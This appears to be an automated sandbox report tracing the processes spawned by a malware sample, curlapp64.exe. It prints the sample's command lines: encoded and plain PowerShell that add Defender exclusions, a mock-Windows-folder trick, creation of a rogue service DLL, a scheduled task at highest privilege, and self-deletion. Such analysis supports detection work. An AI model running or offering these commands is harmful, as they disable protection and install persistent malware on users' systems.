                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                • Detection: 0%, ReversingLabs
                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:15
                                                                                                                                                                                                Start time:04:46:14
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\user\Desktop\curlapp64.exe"
                                                                                                                                                                                                Imagebase:0x7ff7089d0000
                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:16
                                                                                                                                                                                                Start time:04:46:14
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:17
                                                                                                                                                                                                Start time:04:46:14
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $decoded;"
                                                                                                                                                                                                Imagebase:0x7ff7089d0000
                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:18
                                                                                                                                                                                                Start time:04:46:14
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\timeout.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:timeout /t 10 /nobreak
                                                                                                                                                                                                Imagebase:0x7ff6c9000000
                                                                                                                                                                                                File size:32'768 bytes
                                                                                                                                                                                                MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:19
                                                                                                                                                                                                Start time:04:46:14
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:20
                                                                                                                                                                                                Start time:04:46:14
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $decoded;"
                                                                                                                                                                                                Imagebase:0x7ff7be880000
                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:23
                                                                                                                                                                                                Start time:04:46:20
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Users\user\Desktop\curlapp64.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\curlapp64.exe"
                                                                                                                                                                                                Imagebase:0x7ff6cf970000
                                                                                                                                                                                                File size:614'912 bytes
                                                                                                                                                                                                MD5 hash:F9830DF1DFDB31CEC5E3BD9F892EDC9A
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:25
                                                                                                                                                                                                Start time:04:46:25
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:cmd.exe /c rmdir /s /q "C:\Windows \"
                                                                                                                                                                                                Imagebase:0x7ff7089d0000
                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:26
                                                                                                                                                                                                Start time:04:46:25
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:27
                                                                                                                                                                                                Start time:04:46:25
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:cmd.exe /c mkdir "\\?\C:\Windows \System32"
                                                                                                                                                                                                Imagebase:0x7ff7089d0000
                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:28
                                                                                                                                                                                                Start time:04:46:25
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:29
                                                                                                                                                                                                Start time:04:46:25
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\user\Desktop\curlapp64.exe"
                                                                                                                                                                                                Imagebase:0x7ff7089d0000
                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:30
                                                                                                                                                                                                Start time:04:46:25
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:31
                                                                                                                                                                                                Start time:04:46:25
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\timeout.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:timeout /t 10 /nobreak
                                                                                                                                                                                                Imagebase:0x7ff6c9000000
                                                                                                                                                                                                File size:32'768 bytes
                                                                                                                                                                                                MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:32
                                                                                                                                                                                                Start time:04:46:33
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:cmd.exe /c rmdir /s /q "C:\Windows \"
                                                                                                                                                                                                Imagebase:0x7ff7089d0000
                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:33
                                                                                                                                                                                                Start time:04:46:33
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:34
                                                                                                                                                                                                Start time:04:46:33
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:cmd.exe /c mkdir "\\?\C:\Windows \System32"
                                                                                                                                                                                                Imagebase:0x7ff7089d0000
                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:35
                                                                                                                                                                                                Start time:04:46:33
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:36
                                                                                                                                                                                                Start time:04:46:33
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\user\Desktop\curlapp64.exe"
                                                                                                                                                                                                Imagebase:0x7ff7089d0000
                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:37
                                                                                                                                                                                                Start time:04:46:33
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:38
                                                                                                                                                                                                Start time:04:46:33
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\timeout.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:timeout /t 10 /nobreak
                                                                                                                                                                                                Imagebase:0x7ff6c9000000
                                                                                                                                                                                                File size:32'768 bytes
                                                                                                                                                                                                MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:40
                                                                                                                                                                                                Start time:04:46:41
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"
                                                                                                                                                                                                Imagebase:0x7ff7089d0000
                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:41
                                                                                                                                                                                                Start time:04:46:41
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:42
                                                                                                                                                                                                Start time:04:46:41
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
                                                                                                                                                                                                Imagebase:0x7ff7be880000
                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:44
                                                                                                                                                                                                Start time:04:46:47
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:cmd.exe /c sc create x882081 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x882081\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x882081.dat" /f && sc start x882081
                                                                                                                                                                                                Imagebase:0x7ff7089d0000
                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:45
                                                                                                                                                                                                Start time:04:46:47
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:46
                                                                                                                                                                                                Start time:04:46:47
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:sc create x882081 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
                                                                                                                                                                                                Imagebase:0x7ff76d500000
                                                                                                                                                                                                File size:72'192 bytes
                                                                                                                                                                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:47
                                                                                                                                                                                                Start time:04:46:47
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:reg add HKLM\SYSTEM\CurrentControlSet\services\x882081\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x882081.dat" /f
                                                                                                                                                                                                Imagebase:0x7ff652830000
                                                                                                                                                                                                File size:77'312 bytes
                                                                                                                                                                                                MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:48
                                                                                                                                                                                                Start time:04:46:47
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:sc start x882081
                                                                                                                                                                                                Imagebase:0x7ff76d500000
                                                                                                                                                                                                File size:72'192 bytes
                                                                                                                                                                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:49
                                                                                                                                                                                                Start time:04:46:47
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k DcomLaunch
                                                                                                                                                                                                Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:50
                                                                                                                                                                                                Start time:04:46:48
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
                                                                                                                                                                                                Imagebase:0x7ff7089d0000
                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:51
                                                                                                                                                                                                Start time:04:46:48
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:52
                                                                                                                                                                                                Start time:04:46:48
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
                                                                                                                                                                                                Imagebase:0x7ff7be880000
                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:53
                                                                                                                                                                                                Start time:04:46:49
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:cmd.exe /c start "" "C:\Windows\System32\console_zero.exe"
                                                                                                                                                                                                Imagebase:0x7ff7089d0000
                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:54
                                                                                                                                                                                                Start time:04:46:49
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:55
                                                                                                                                                                                                Start time:04:46:49
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\console_zero.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"C:\Windows\System32\console_zero.exe"
                                                                                                                                                                                                Imagebase:0x7ff6bc070000
                                                                                                                                                                                                File size:664'064 bytes
                                                                                                                                                                                                MD5 hash:49672519E74E8AD135DAE7345BCEFF41
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                • Detection: 75%, ReversingLabs
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:56
                                                                                                                                                                                                Start time:04:46:49
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
                                                                                                                                                                                                Imagebase:0x7ff7089d0000
                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:57
                                                                                                                                                                                                Start time:04:46:49
                                                                                                                                                                                                Start date:05/11/2024
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:58
